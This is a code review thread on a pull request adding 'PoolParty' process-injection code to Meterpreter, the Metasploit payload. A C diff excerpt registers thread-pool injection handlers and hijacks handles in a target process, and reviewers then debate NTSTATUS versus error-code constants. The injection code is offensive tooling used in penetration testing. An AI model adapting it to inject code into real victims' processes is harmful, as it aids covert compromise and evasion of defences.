c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+	os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	NTSTATUS(*pRtlGetVersion)(OSVERSIONINFO * os) = (NTSTATUS(*)(OSVERSIONINFO * os)) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
+	dprintf("[INJECT][supports_poolparty_injection] RtlGetVersion: %p", pRtlGetVersion);
+	if (!pRtlGetVersion(&os)) {
+		dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
+		dprintf("[INJECT][supports_poolparty_injection] os.dwMajorVersion: %d os.dwMinorVersion: %d", os.dwMajorVersion, os.dwMinorVersion);
+		if (os.dwMajorVersion >= 10) {
+			if (dwDestinationArch == dwSourceArch && dwSourceArch == PROCESS_ARCH_X64) {
+				return TRUE;
+			}
+		}
+	}
+	return FALSE;
+}
+
+HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess) {
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 2048;
+	ULONG dwInformationSizeOut = 0;
+	HANDLE hCurrProcess = GetCurrentProcess();
+	HANDLE hHeap = GetProcessHeap();
+	PPROCESS_HANDLE_SNAPSHOT_INFORMATION lpProcessInfo = NULL;
+	PPUBLIC_OBJECT_TYPE_INFORMATION lpObjectInfo = NULL;
+	pNtDll* ntDll = GetOrInitNtDll();
+
+	DWORD ntStatus = 0;
+	lpProcessInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwInformationSizeIn);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p", lpProcessInfo);
+
+	while (TRUE) {
+		ntStatus = ntdll->pNtQueryInformationProcess(hProcess, ProcessHandleInformation, lpProcessInfo, dwInformationSizeIn, &dwInformationSizeOut);
+		dprintf("[INJECT][inject_via_poolparty][get_remote_handle] NtQueryInformationProcess() : %p", ntStatus);
+		if (ntStatus == 0xC0000004L && dwInformationSizeIn != dwInformationSizeOut) {
+			lpProcessInfo = HeapReAlloc(hHeap, 0, lpProcessInfo, dwInformationSizeOut);
+			dprintf("[INJECT][inject_via_poolparty][get_remote_handle] HeapReAlloc lpProcessInfo: %p", lpProcessInfo);
+			dwInformationSizeIn = dwInformationSizeOut;
+			continue;
+		}
+		if (ntStatus != 0 && ntStatus != 0xC0000004L) {
+			HeapFree(hHeap, 0, lpProcessInfo);
+			return INVALID_HANDLE_VALUE;
+		}
+		if (ntStatus == 0) {
```

Comment:
Isn't this `ERROR_SUCCESS`?
`ERROR_SUCCESS` would be a lot easier to read.

Reply:
if the ntStatus is good means I have obtained the information with the correct size and I can proceed with the next step of the Handle Hijack, so I cannot do `return ERROR_SUCCESS`

Reply:
Sorry- I don't mean the return value.  I mean the comparison value, purely for code reading clarity.
```suggestion
		if (ntStatus == ERROR_SUCCESS) {
```

Reply:
Sure that's better :D, are the NT_STATUS error codes ok to be left like this? or should I define them in a more human-readable way?

Reply:
If they're already defined, I'd say use them?

Reply:
I'm going to be an actually guy here and point out that [NTSTATUS codes](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55) are not the same as [System Error Codes](https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499-). In this case if it is an NTSTATUS code, it should be `STATUS_SUCCESS` not `ERROR_SUCCESS`.

Reply:
Technically correct is the best kind of correct.